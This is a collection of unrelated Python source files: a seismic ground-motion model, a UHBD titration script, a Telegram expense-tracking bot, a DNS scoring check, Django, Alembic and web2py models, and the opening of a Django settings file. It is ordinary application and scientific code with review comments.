src
stringlengths 721
1.04M
|
|---|
import numpy as np
# Coefficient tables for the ground-motion model below.  Every list/array is
# indexed by spectral period: entry i corresponds to PERIODS[i] (seconds).
PERIODS = np.array([0.01, 0.07, 0.09, 0.11, 0.14, 0.18, 0.22, 0.27, 0.34, 0.42, 0.53, 0.65, 0.81, 1.01, 1.25, 1.56, 1.92, 2.44, 3.03, 3.7, 4.55, 5.88, 7.14, 9.09])
# Distance attenuation (forearc / backarc) and site coefficients.
c1 = [-0.00219, -0.00236, -0.00244, -0.00245, -0.0024, -0.00235, -0.00235, -0.00233, -0.00231, -0.00224, -0.00213, -0.002, -0.00183, -0.00158, -0.00133, -0.00112, -0.00086, -0.00059, -0.00039, -0.00023, -0.00005, 0, 0, 0]
c2 = [-0.00298, -0.00329, -0.00346, -0.00356, -0.00357, -0.00358, -0.00355, -0.00346, -0.00333, -0.00315, -0.0029, -0.00262, -0.00234, -0.00205, -0.00177, -0.00152, -0.00125, -0.00097, -0.00075, -0.00057, -0.0004, -0.00027, -0.00019, -0.00019]
c3 = [-0.219, -0.046, 0.027, 0.01, -0.082, -0.18, -0.289, -0.386, -0.438, -0.52, -0.606, -0.672, -0.705, -0.69, -0.646, -0.578, -0.518, -0.513, -0.554, -0.574, -0.561, -0.491, -0.462, -0.413]
# Magnitude scaling: intercept a and slope b.
a = [2.8193, 3.1807, 3.3592, 3.4483, 3.5005, 3.4463, 3.3178, 3.2008, 3.0371, 2.7958, 2.5332, 2.3234, 2.1321, 1.9852, 1.8442, 1.6301, 1.4124, 1.1154, 0.7965, 0.5093, 0.2578, -0.1469, -0.5012, -1.093]
b = [0.1908, 0.1759, 0.17, 0.1669, 0.1604, 0.165, 0.1763, 0.1839, 0.197, 0.2154, 0.2331, 0.2435, 0.2522, 0.2561, 0.2599, 0.273, 0.2851, 0.3015, 0.3197, 0.3361, 0.3497, 0.3835, 0.4119, 0.4641]
# Additive regional adjustment applied when cascadia == 1.
Dcascadia = [-0.301, -0.357, -0.357, -0.319, -0.272, -0.237, -0.183, -0.114, -0.046, 0.002, 0.007, 0.011, 0.014, 0.021, 0.089, 0.139, 0.174, 0.129, 0.079, 0.044, 0.013, 0, 0, 0]
# Intra-event (PHI) and inter-event (TAU) standard deviations.
PHI = [0.284, 0.313, 0.326, 0.329, 0.324, 0.312, 0.31, 0.312, 0.307, 0.295, 0.276, 0.257, 0.249, 0.249, 0.261, 0.274, 0.285, 0.275, 0.264, 0.252, 0.237, 0.218, 0.201, 0.175]
TAU = [0.196, 0.215, 0.22, 0.218, 0.212, 0.206, 0.202, 0.199, 0.191, 0.171, 0.155, 0.147, 0.131, 0.115, 0.11, 0.113, 0.121, 0.132, 0.137, 0.138, 0.147, 0.151, 0.148, 0.155]

def computeSpectra(mag, r, faba, vs30, cascadia, epistemic, per):
    """Compute log10 spectral acceleration at one tabulated period.

    Parameters
    ----------
    mag : float       -- magnitude
    r : float         -- distance (km)
    faba : int        -- 1 for backarc sites, 0 for forearc (selects c1 vs c2)
    vs30 : float      -- site shear-wave velocity, referenced to 760 m/s
    cascadia : int    -- 1 applies the Dcascadia regional adjustment
    epistemic : int   -- +1/-1 applies the epistemic correction, 0 disables it
    per : float       -- spectral period; must be one of PERIODS

    Returns
    -------
    float -- log10(Sa) for the requested period.

    Raises
    ------
    IndexError -- if `per` is not one of the tabulated PERIODS.
    """
    F = 1 - faba
    B = faba
    # np.isclose generalizes the original exact comparison so periods that
    # pick up float rounding noise still match; unknown periods now raise a
    # descriptive IndexError instead of an opaque one.
    matches = np.nonzero(np.isclose(PERIODS, per))[0]
    if matches.size == 0:
        raise IndexError("period {} is not one of the tabulated PERIODS".format(per))
    pIdx = matches[0]
    c0 = a[pIdx] + b[pIdx] * mag
    # Effective distance with a 60 km pseudo-depth term.
    reff = np.sqrt(r**2 + 60**2)
    logSa = (c0 - np.log10(reff)
             + c1[pIdx] * F * r + c2[pIdx] * B * r
             + c3[pIdx] * np.log10(vs30 / 760))
    if cascadia == 1:
        logSa += Dcascadia[pIdx]
    # Epistemic-uncertainty correction: +/- min(0.15 + 0.0007*r, 0.35).
    # (Collapses the two duplicated branches of the original.)
    if epistemic in (1, -1):
        logSa += epistemic * min(0.15 + 0.0007 * r, 0.35)
    return logSa
def interEventSigma(periods):
    """Inter-event standard deviation (tau), log-log interpolated at each period."""
    log_periods = np.log10(PERIODS)
    return [np.interp(np.log10(t), log_periods, TAU) for t in periods]
def intraEventSigma(periods):
    """Intra-event standard deviation (phi), log-log interpolated at each period."""
    log_periods = np.log10(PERIODS)
    return [np.interp(np.log10(t), log_periods, PHI) for t in periods]
|
"""
single_file.py:
A script that runs a UHBD calculation on a single file.
"""
"""
Version notes:
0.4: 060113
0.4.1: 060403
Hokiness fix. Changed from some_path = x + os.sep + y to os.path.join(x,y)
"""
__author__ = "Michael J. Harms"
__date__ = "060403"
__version__ = "0.4.1"
# USER INPUTS
# Titration sweep range/step and the solvent conditions for the UHBD run.
pH_start = 0
pH_stop = 16
pH_interval = 0.25
ionic_strength = 0.1
# NOTE(review): dielectric presumably the protein-interior dielectric constant
# passed through to uhbd.main — confirm against the uhbd module.
dielectric = 20

import initialize
import uhbd
import os
import sys
import argParser
def main(filename,output_path,pH_start,pH_stop,pH_interval,ionic_strength,dielectric):
    """Run a UHBD titration on one pdb file and copy the results to output_path.

    filename/output_path are resolved relative to the invocation directory;
    the remaining arguments are forwarded unchanged to uhbd.main.
    (Python 2 code: note the `except OSError, value` and `print` syntax.)
    """
    filename = os.path.join(initialize.invocation_path,filename)

    # Create output directory (if invoked from command line)
    if __name__ == "__main__":
        try:
            os.mkdir(os.path.join(initialize.invocation_path,output_path))
        except OSError, value:
            # Don't stop if we are only overwriting existing directory
            # (errno 17 == EEXIST; any other OSError is fatal).
            if value[0] != 17:
                print 'File error.'
                print value[0], output_path, value[1]
                sys.exit()

    # Perform UHBD run, then collect outputs and clean up scratch files.
    uhbd.main(filename,pH_start,pH_stop,pH_interval,ionic_strength,dielectric)
    uhbd.copyFinalOutput(os.path.join(initialize.invocation_path,output_path))
    uhbd.runCleanup()
# If this is invoked from the command line, run the main function
if __name__ == "__main__":

    # Grab command line options: two positional arguments plus optional
    # dielectric / ionic_strength / pHtitr overrides.
    required, optional = argParser.main(sys.argv,["pdb_file","output_dir"],
                                        ["inpfile","outdir"],
                                        ["dielectric","ionic_strength","pHtitr"])

    # pHtitr unpacks as (start, stop, interval).
    main(required["pdb_file"],required["output_dir"],optional.pHtitr[0],
         optional.pHtitr[1],optional.pHtitr[2],optional.ionic_strength,
         optional.dielectric)
|
from mmhandler import MmHandler
import telebot
import argparse
import re
import logging
import yaml
import os

# SECURITY FIX: the original constructed a throwaway TeleBot with a
# hard-coded API token (leaked credential) before overwriting it here.
# The real token is loaded from the YAML config in the __main__ block.
TOKEN = ''
bot = telebot.TeleBot(TOKEN)
handler = MmHandler(0)  # default user_id = 0 until a chat binds it

# Help text shown by /help and on unrecognized input; `with` guarantees
# the file handle is closed (the original leaked it on read errors).
with open('help.txt', 'r') as help_file:
    help_message = help_file.read()

# Recognized report periods and category filters (matched after lowercasing).
report_periods = {'день', 'неделю', 'месяц', 'год'}
category_mods = {'расходов', 'доходов'}
# Shared "bad command format" error raised by the parser below.
format_error = Exception('Неправильный формат команды!')
@bot.message_handler(commands=['start'])
def start(message):
    """Handle /start: bind the handler to this chat and send its greeting."""
    handler.user_id = message.chat.id
    bot.send_message(message.chat.id, handler.start())
@bot.message_handler(commands=['help'])
def help(message):
    """Handle /help: send the greeting line followed by the command list."""
    handler.user_id = message.chat.id
    for text in ('Привет! Список моих команд:', help_message):
        bot.send_message(message.chat.id, text)
@bot.message_handler(content_types=["text"])
def parse(message):
    """Parse a free-form text command from the user and dispatch it.

    Recognized forms (input is lowercased and whitespace-split first):
      +N / -N [категория [описание...]]          -- record an operation
      показать|покажи категории [расходов|доходов]
      добавить|добавь|удалить|удали категорию <имя>
      удалить|удали другое                        -- drop the reserved category
      отчет [за <период> | с <дата> [по <дата>]]  -- dates are DD-MM-YYYY
    Any exception is reported back to the chat instead of crashing the bot.
    """
    handler.user_id = message.chat.id
    try:
        str_array = message.text.lower().split()
        length = len(str_array)
        # if empty line
        if length == 0:
            bot.send_message(message.chat.id, 'Забыл список команд? Держи:')
            bot.send_message(message.chat.id, help_message)
        elif length == 2 and (str_array[0] == "удалить" or str_array[0] == "удали") and str_array[1] == "другое":
            # The user-facing word "другое" maps to the internal category "other".
            str_array[1] = "other"
            handler_message = handler.del_category(str_array[1])
            bot.send_message(message.chat.id, handler_message)
        # if format +/-....
        elif str_array[0][0] == '+' or str_array[0][0] == '-':
            if length == 1:
                if re.match(r'[+]\d+', str_array[0]) or re.match(r'[-]\d+', str_array[0]):
                    handler_message = handler.add_operation(int(str_array[0]))
                    bot.send_message(message.chat.id, handler_message)
                else:
                    raise format_error
            elif length >= 2 and re.match(r'[а-яa-zА-ЯA-Z]+', str_array[1]):
                if re.match(r'[+]\d+', str_array[0]) or re.match(r'[-]\d+', str_array[0]):
                    if length >= 3:
                        # Everything after the category is a free-text description.
                        description_buf = ' '.join(str_array[2:length])
                        handler_message = handler.add_operation(int(str_array[0]), str_array[1], description_buf)
                    else:
                        handler_message = handler.add_operation(int(str_array[0]), str_array[1])
                    bot.send_message(message.chat.id, handler_message)
                else:
                    raise format_error
        elif length >= 2 and (str_array[0] == 'показать' or str_array[0] == "покажи") and str_array[1] == 'категории':
            if length == 3:
                if str_array[2] in category_mods:
                    handler_message = handler.show_categories(str_array[2])
                    bot.send_message(message.chat.id, handler_message)
                else:
                    raise Exception('Неправильный формат команды!')
            else:
                handler_message = handler.show_categories()
                bot.send_message(message.chat.id, handler_message)
        elif length == 3 and str_array[1] == 'категорию' and re.match(r'[а-яa-zA-ZА-Я]+', str_array[2]):
            if str_array[0] == 'удалить' or str_array[0] == "удали":
                if str_array[2] == "другое":
                    bot.send_message(message.chat.id, "Для того чтобы удалить категорию другое и все операции связанные с ней, введите команду: удалить другое")
                    return
                handler_message = handler.del_category(str_array[2])
                bot.send_message(message.chat.id, handler_message)
            elif str_array[0] == 'добавить' or str_array[0] == 'добавь':
                handler_message = handler.add_category(str_array[2])
                bot.send_message(message.chat.id, handler_message)
            else:
                raise format_error
        elif str_array[0] == 'отчет':
            if length >= 3:
                if str_array[1] == 'за' and (str_array[2] in report_periods):
                    handler_message = handler.view_report(str_array[2])
                    bot.send_message(message.chat.id, handler_message)
                    bot.send_chat_action(message.chat.id, 'typing')
                    # Send the generated charts and remove the temp files;
                    # `with` closes each handle before the unlink (the
                    # original leaked both file handles).
                    income_path = 'tmp/income' + str(handler.user_id) + '.png'
                    with open(income_path, 'rb') as image_file:
                        bot.send_photo(message.chat.id, image_file)
                    os.remove(income_path)
                    expense_path = 'tmp/expense' + str(handler.user_id) + '.png'
                    with open(expense_path, 'rb') as image_file:
                        bot.send_photo(message.chat.id, image_file)
                    os.remove(expense_path)
                elif str_array[1] == 'с' and re.match(r'\d{1,2}-\d{1,2}-\d{4}', str_array[2]):
                    # Dates arrive as DD-MM-YYYY; the handler expects YYYY-MM-DD.
                    date_from = '-'.join(str_array[2].split('-')[::-1])
                    # BUG FIX: reading str_array[4] requires length >= 5 (the
                    # original checked >= 4, so "отчет с <дата> по" raised
                    # IndexError); a missing end date now yields an open-ended report.
                    if length >= 5 and str_array[3] == 'по' and re.match(r'\d{1,2}-\d{1,2}-\d{4}', str_array[4]):
                        date_to = '-'.join(str_array[4].split('-')[::-1])
                        handler_message = handler.view_custom_report(date_from, date_to)
                    else:
                        handler_message = handler.view_custom_report(date_from)
                    bot.send_message(message.chat.id, handler_message)
                else:
                    raise format_error
            elif length == 1:
                # No period supplied: offer an inline keyboard with the options.
                keyboard = telebot.types.InlineKeyboardMarkup()
                button_month = telebot.types.InlineKeyboardButton(text="месяц", callback_data="месяц")
                button_day = telebot.types.InlineKeyboardButton(text="день", callback_data="день")
                button_week = telebot.types.InlineKeyboardButton(text="неделя", callback_data="неделю")
                button_year = telebot.types.InlineKeyboardButton(text="год", callback_data="год")
                keyboard.add(button_day)
                keyboard.add(button_week)
                keyboard.add(button_month)
                keyboard.add(button_year)
                bot.send_message(message.chat.id, "Выбери период", reply_markup=keyboard)
            else:
                raise format_error
        else:
            bot.send_message(message.chat.id, 'Не знаю такой команды! Список моих команд:')
            bot.send_message(message.chat.id, help_message)
    except Exception as e:
        handler_message = 'Ошибка: {} '.format(e)
        bot.send_message(message.chat.id, handler_message)
# handler for inline-keyboard
@bot.callback_query_handler(func=lambda call: True)
def callback_inline(call):
    """Handle an inline-keyboard choice: render the report for the chosen period."""
    if call.message:
        if call.data in report_periods:
            handler.user_id = call.message.chat.id
            handler_message = handler.view_report(call.data)
            # Replace the keyboard message with the report text.
            bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,
                                  text=handler_message)
            bot.send_chat_action(call.message.chat.id, 'typing')
            # Send the generated charts and remove the temp files; `with`
            # closes each handle before the unlink (the original leaked both).
            income_path = 'tmp/income' + str(handler.user_id) + '.png'
            with open(income_path, 'rb') as image_file:
                bot.send_photo(call.message.chat.id, image_file)
            os.remove(income_path)
            expense_path = 'tmp/expense' + str(handler.user_id) + '.png'
            with open(expense_path, 'rb') as image_file:
                bot.send_photo(call.message.chat.id, image_file)
            os.remove(expense_path)
# Entry point: parse flags, load the config, then run the endless polling loop.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Process some flags.')
    group = parser.add_mutually_exclusive_group()
    group.add_argument('--develop', help='Develop dirs', action="store_true")
    group.add_argument('--production', help='Production dirs', action="store_true")
    args = parser.parse_args()

    if args.develop:
        config_path = '../config/config.yaml'
    # BUG FIX: the original checked args.prod, which does not exist for a
    # --production flag (AttributeError on every production start).
    elif args.production:
        config_path = '/etc/moneymoney.d/config.yaml'
    else:
        # BUG FIX: was ArgumentParser.error (NameError on the class);
        # parser.error prints the message and exits with status 2.
        parser.error("You should specify either --develop or --production option!")

    # safe_load: never execute arbitrary tags from the config file
    # (yaml.load without a Loader is deprecated and unsafe).
    with open(config_path, 'r') as yaml_config:
        config = yaml.safe_load(yaml_config)
    print(config)
    TOKEN = config['token']
    print(TOKEN)

    logger = telebot.logger
    telebot.logger.setLevel(logging.DEBUG)
    bot.token = TOKEN
    bot.polling(none_stop=True)
|
from __future__ import absolute_import
import config
from dns.resolver import Resolver

# DEFAULTS
# Resolver tuning, in seconds; per-deployment overrides merge in below.
dns_config = {
    'timeout': 15,
    'lifetime': 15,
}
# /DEFAULTS

# CONFIG
# Merge operator-supplied overrides from the global check configuration.
if "dns" in config.CHECKS:
    dns_config.update(config.CHECKS["dns"])
# /CONFIG
def check_dns(check, data):
    """Score a DNS service: query data["HOST"] for data["LOOKUP"] (record type
    data["TYPE"]) and pass the check iff data["EXPECTED"] appears in the answers.

    check -- ScoreEngine check object (addOutput / setPassed / getServiceName)
    data  -- dict with "HOST", "LOOKUP", "TYPE" and "EXPECTED" keys
    """
    check.addOutput("ScoreEngine: {} Check\n".format(check.getServiceName()))
    # BUG FIX: "Sucessful" -> "Successful" (user-visible typo in the report).
    check.addOutput("EXPECTED: Successful and correct query against the DNS server")
    check.addOutput("OUTPUT:\n")

    # Set up a resolver pointed exclusively at the scored host.
    resolv = Resolver()
    resolv.nameservers = [data["HOST"]]
    resolv.timeout = dns_config["timeout"]
    resolv.lifetime = dns_config["lifetime"]

    check.addOutput("Starting check...")
    try:
        # Query resolver
        check.addOutput("Querying {HOST} for '{LOOKUP}'...".format(**data))
        lookup = resolv.query(data["LOOKUP"], data["TYPE"])

        # Scan every answer; log the unexpected ones so graders see them.
        found = False
        for ans in lookup:
            if str(ans) == data["EXPECTED"]:
                found = True
            else:
                check.addOutput("NOTICE: DNS Server returned {}".format(ans))

        if not found:
            check.addOutput("ERROR: DNS Server did not respond with the correct IP")
            return

        # We're good!
        check.setPassed()
        check.addOutput("Check successful!")
    except Exception as e:
        # Any resolver failure (timeout, NXDOMAIN, ...) fails the check.
        check.addOutput("ERROR: {}: {}".format(type(e).__name__, e))
        return
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial migration: creates the CrazyObject table, a flat store of raw
    GDELT-style event rows (actor codes, geography, event codes and counts).

    NOTE(review): the field types look inconsistent — e.g. ActionGeo_Lat is
    CharField(max_length=4) while Actor1Geo_Lat is TextField, and
    Actor1Geo_CountryCode is an IntegerField while the Actor2 counterpart is
    a CharField.  Confirm against the source data spec before relying on them.
    """

    # First migration for this app: no dependencies.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='CrazyObject',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ActionGeo_ADM1Code', models.CharField(max_length=10, null=True, blank=True)),
                ('ActionGeo_CountryCode', models.CharField(max_length=4, null=True, blank=True)),
                ('ActionGeo_FeatureID', models.CharField(max_length=4, null=True, blank=True)),
                ('ActionGeo_FullName', models.CharField(max_length=200, null=True, blank=True)),
                ('ActionGeo_Lat', models.CharField(max_length=4, null=True, blank=True)),
                ('ActionGeo_Long', models.TextField(null=True, blank=True)),
                ('ActionGeo_Type', models.TextField(null=True, blank=True)),
                ('Actor1Code', models.TextField(null=True, blank=True)),
                ('Actor1CountryCode', models.TextField(null=True, blank=True)),
                ('Actor1EthnicCode', models.TextField(null=True, blank=True)),
                ('Actor1Geo_ADM1Code', models.TextField(null=True, blank=True)),
                ('Actor1Geo_CountryCode', models.IntegerField(null=True, blank=True)),
                ('Actor1Geo_FeatureID', models.IntegerField(null=True, blank=True)),
                ('Actor1Geo_FullName', models.TextField(null=True, blank=True)),
                ('Actor1Geo_Lat', models.TextField(null=True, blank=True)),
                ('Actor1Geo_Long', models.TextField(null=True, blank=True)),
                ('Actor1Geo_Type', models.IntegerField(null=True, blank=True)),
                ('Actor1KnownGroupCode', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor1Name', models.TextField(null=True, blank=True)),
                ('Actor1Religion1Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor1Religion2Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor1Type1Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor1Type2Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor1Type3Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2CountryCode', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2EthnicCode', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Geo_ADM1Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Geo_CountryCode', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Geo_FeatureID', models.IntegerField(null=True, blank=True)),
                ('Actor2Geo_FullName', models.TextField(null=True, blank=True)),
                ('Actor2Geo_Lat', models.TextField(null=True, blank=True)),
                ('Actor2Geo_Long', models.TextField(null=True, blank=True)),
                ('Actor2Geo_Type', models.IntegerField(null=True, blank=True)),
                ('Actor2KnownGroupCode', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Name', models.TextField(null=True, blank=True)),
                ('Actor2Religion1Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Religion2Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Type1Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Type2Code', models.CharField(max_length=4, null=True, blank=True)),
                ('Actor2Type3Code', models.CharField(max_length=4, null=True, blank=True)),
                ('AvgTone', models.TextField(null=True, blank=True)),
                ('DATEADDED', models.IntegerField(null=True, blank=True)),
                ('EventBaseCode', models.IntegerField(null=True, blank=True)),
                ('EventCode', models.IntegerField(null=True, blank=True)),
                ('EventRootCode', models.IntegerField(null=True, blank=True)),
                ('FractionDate', models.TextField(null=True, blank=True)),
                ('GLOBALEVENTID', models.IntegerField(null=True, blank=True)),
                ('GoldsteinScale', models.TextField(null=True, blank=True)),
                ('IsRootEvent', models.IntegerField(null=True, blank=True)),
                ('MonthYear', models.IntegerField(null=True, blank=True)),
                ('NumArticles', models.IntegerField(null=True, blank=True)),
                ('NumMentions', models.IntegerField(null=True, blank=True)),
                ('NumSources', models.IntegerField(null=True, blank=True)),
                ('QuadClass', models.IntegerField(null=True, blank=True)),
                ('SOURCEURL', models.TextField(null=True, blank=True)),
                ('SQLDATE', models.IntegerField(null=True, blank=True)),
                ('Year', models.IntegerField(null=True, blank=True)),
                ('Day', models.IntegerField(null=True, blank=True)),
                ('Month', models.IntegerField(null=True, blank=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
|
# -*- coding: utf-8 -*-
# web2py model file: executed per request with framework globals
# (DAL, session, request, response, T, Field, ...) already in scope.
import urllib
from gluon.custom_import import track_changes; track_changes(True) # for reloading modules
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################

## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()

# Datastore-backed DAL, with the NDB adapter enabled.
db = DAL('google:datastore', adapter_args={'use_ndb':True})

## store sessions and tickets there
session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))

## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []

## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'

#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db)
crud, service, plugins = Crud(db), Service(), PluginManager()

# Logging in via Google Accounts
from gluon.contrib.login_methods.gae_google_account import GaeGoogleAccount
auth.settings.login_form=GaeGoogleAccount()

# No logging of auth events.
auth.settings.logging_enabled = False

# Adds a timezone field to the auth table.
from pytz.gae import pytz
from plugin_timezone import tz_nice_detector_widget
my_tz_nice_detector_widget = lambda field, value : tz_nice_detector_widget(field, value, autodetect=True)
auth.settings.extra_fields['auth_user']= [
    Field('user_timezone', 'string', widget=my_tz_nice_detector_widget),
]

## create all tables needed by auth if not custom tables
auth.define_tables(username=False)
auth.settings.table_user.first_name.readable = auth.settings.table_user.first_name.writable = True
auth.settings.table_user.last_name.readable = auth.settings.table_user.last_name.writable = True
auth.settings.table_user.user_timezone.label = T('Time zone')

## configure email
mail = auth.settings.mailer
# NOTE(review): `'logging' or '...'` always evaluates to 'logging', so mail is
# permanently in debug/logging mode; swap the operands to really use SMTP.
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = 'you@gmail.com'
# NOTE(review): placeholder credentials — keep real ones out of source control.
mail.settings.login = 'username:password'

## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True

##### This tells web2py to use GAE logins.
# NOTE(review): this re-imports and re-assigns the same GaeGoogleAccount login
# form already set unconditionally above — the duplication looks redundant.
if request.env.web2py_runtime_gae:
    from gluon.contrib.login_methods.gae_google_account import GaeGoogleAccount
    auth.settings.login_form = GaeGoogleAccount()
    # Google manages the credentials, so disable every local password action.
    auth.settings.actions_disabled.append('request_reset_password')
    auth.settings.actions_disabled.append('reset_password')
    auth.settings.actions_disabled.append('retrieve_password')
    auth.settings.actions_disabled.append('email_reset_password')
    auth.settings.actions_disabled.append('change_password')
    auth.settings.actions_disabled.append('retrieve_username')
    auth.settings.actions_disabled.append('verify_email')
    auth.settings.actions_disabled.append('register')
    # auth.settings.actions_disabled.append('profile')
    db.auth_user.email.writable = False
#### How to get an email address.
def get_user_email():
    """Return the current user's email address, lowercased; None if logged out."""
    if request.env.web2py_runtime_gae:
        # On GAE, ask the Users API for the authenticated account.
        from google.appengine.api import users as googleusers
        gae_user = googleusers.get_current_user()
        return None if gae_user is None else gae_user.email().lower()
    # Outside GAE, fall back to the web2py auth session.
    if auth.user is None:
        return None
    return auth.user.email.lower()
## How to get an original email address (with original capitalization).
def get_user_system_email():
    """Return the email with its original capitalization; use this for sending emails."""
    if request.env.web2py_runtime_gae:
        # On GAE, ask the Users API for the authenticated account.
        from google.appengine.api import users as googleusers
        gae_user = googleusers.get_current_user()
        return None if gae_user is None else gae_user.email()
    # Outside GAE, fall back to the web2py auth session.
    if auth.user is None:
        return None
    return auth.user.email
## How to get a user id (Google user id, in production).
def get_user_id():
    """Return the current user's id: the Google user id on GAE, otherwise the
    auth user's email (there is no separate numeric id outside GAE).
    """
    if request.env.web2py_runtime_gae:
        from google.appengine.api import users as googleusers
        u = googleusers.get_current_user()
        if u is None:
            return None
        else:
            return u.user_id()
    else:
        if auth.user is None:
            return None
        else:
            # NOTE(review): falls back to the email address, not an id —
            # confirm callers treat user_id as an opaque string.
            return auth.user.email
# Stores these in the current object.
# Caches the requesting user's identity for this request cycle so modules
# can read it via gluon.current without re-querying.
from gluon import current
current.user_email = get_user_email()
current.user_system_email = get_user_system_email()
current.user_id = get_user_id()

######################
# Logging

import logging, logging.handlers
class GAEHandler(logging.Handler):
    """
    Logging handler for GAE DataStore: persists each LogRecord as a 'Log' entity.
    """
    def emit(self, record):
        # Imported lazily so this module also loads outside GAE.
        from google.appengine.ext import db

        # NOTE(review): the model class is re-declared on every emit() call;
        # it maps to the same 'Log' kind each time, but hoisting it to module
        # level would avoid the repeated class creation.
        class Log(db.Model):
            name = db.StringProperty()
            level = db.StringProperty()
            module = db.StringProperty()
            func_name = db.StringProperty()
            line_no = db.IntegerProperty()
            thread = db.IntegerProperty()
            thread_name = db.StringProperty()
            process = db.IntegerProperty()
            message = db.StringProperty(multiline=True)
            args = db.StringProperty(multiline=True)
            date = db.DateTimeProperty(auto_now_add=True)

        # Copy the LogRecord fields into a datastore entity and persist it.
        log = Log()
        log.name = record.name
        log.level = record.levelname
        log.module = record.module
        log.func_name = record.funcName
        log.line_no = record.lineno
        log.thread = record.thread
        log.thread_name = record.threadName
        log.process = record.process
        log.message = record.msg
        log.args = str(record.args)
        log.put()
def get_configured_logger(name):
    """Return the logger *name*, attaching a default handler on first use.

    On GAE, WARNING+ records go to the datastore via GAEHandler; elsewhere,
    DEBUG+ records go to a small rotating file under private/app.log.
    A logger that already has handlers is returned untouched.
    """
    logger = logging.getLogger(name)
    if not logger.handlers:
        # Not configured yet — attach the environment-appropriate handler.
        if request.env.web2py_runtime_gae:
            gae_handler = GAEHandler()
            gae_handler.setLevel(logging.WARNING)
            logger.addHandler(gae_handler)
            logger.setLevel(logging.WARNING)
        else:
            import os
            fmt = "%(asctime)s %(levelname)s %(process)s %(thread)s %(funcName)s():%(lineno)d %(message)s"
            file_handler = logging.handlers.RotatingFileHandler(
                os.path.join(request.folder, 'private/app.log'),
                maxBytes=1024, backupCount=2)
            file_handler.setFormatter(logging.Formatter(fmt))
            file_handler.setLevel(logging.DEBUG)
            logger.addHandler(file_handler)
            logger.setLevel(logging.DEBUG)
    return logger
# Assign application logger to a global var
logger = get_configured_logger(request.application)
# Assign application logger to a global var
# NOTE(review): this second block immediately overrides the assignment above;
# on GAE the bare `logging` module is used instead.  The first call still runs
# and attaches handlers to the named logger as a side effect — confirm the
# duplication is intentional before removing either.
if request.env.web2py_runtime_gae:
    logger = logging
else:
    logger = get_configured_logger(request.application)
# Makes the db and logger available also to modules.
current.db = db
current.logger = logger
# Let's log the user.
logger.info("User: %r Email: %r Id: %r" %
            (current.user_email, current.user_system_email, current.user_id))
# Reconstruct and expose the scheme://host of the current request.
request_scheme = 'http'
if request.is_https:
    request_scheme = 'https'
request_host = request_scheme + '://' + request.env.http_host
logger.info("Request host: %r" % request_host)
current.request_host = request_host
|
"""empty message
Revision ID: 7ad0da0d1b72
Revises: af193c376724
Create Date: 2017-07-06 17:42:35.513647
"""
# revision identifiers, used by Alembic.
revision = '7ad0da0d1b72'
down_revision = 'af193c376724'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the recurs table and its M2M link to questionnaire-bank questionnaires."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table(
        'recurs',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('days_to_start', sa.Integer(), nullable=False),
        sa.Column('days_in_cycle', sa.Integer(), nullable=False),
        sa.Column('days_till_termination', sa.Integer(), nullable=True),
        sa.PrimaryKeyConstraint('id'))
    op.create_table(
        'questionnaire_bank_questionnaire_recurs',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('questionnaire_bank_questionnaire_id', sa.Integer(), nullable=False),
        sa.Column('recur_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(
            ['questionnaire_bank_questionnaire_id'],
            ['questionnaire_bank_questionnaires.id'],
            ondelete='CASCADE'),
        sa.ForeignKeyConstraint(
            ['recur_id'],
            ['recurs.id'],
            ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint(
            'questionnaire_bank_questionnaire_id',
            'recur_id',
            name='_questionnaire_bank_questionnaire_recure'))
    # ### end Alembic commands ###
def downgrade():
    """Drop the tables created by upgrade(), link table first."""
    # ### commands auto generated by Alembic - please adjust! ###
    for table_name in ('questionnaire_bank_questionnaire_recurs', 'recurs'):
        op.drop_table(table_name)
    # ### end Alembic commands ###
|
"""
Django settings for socializa project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
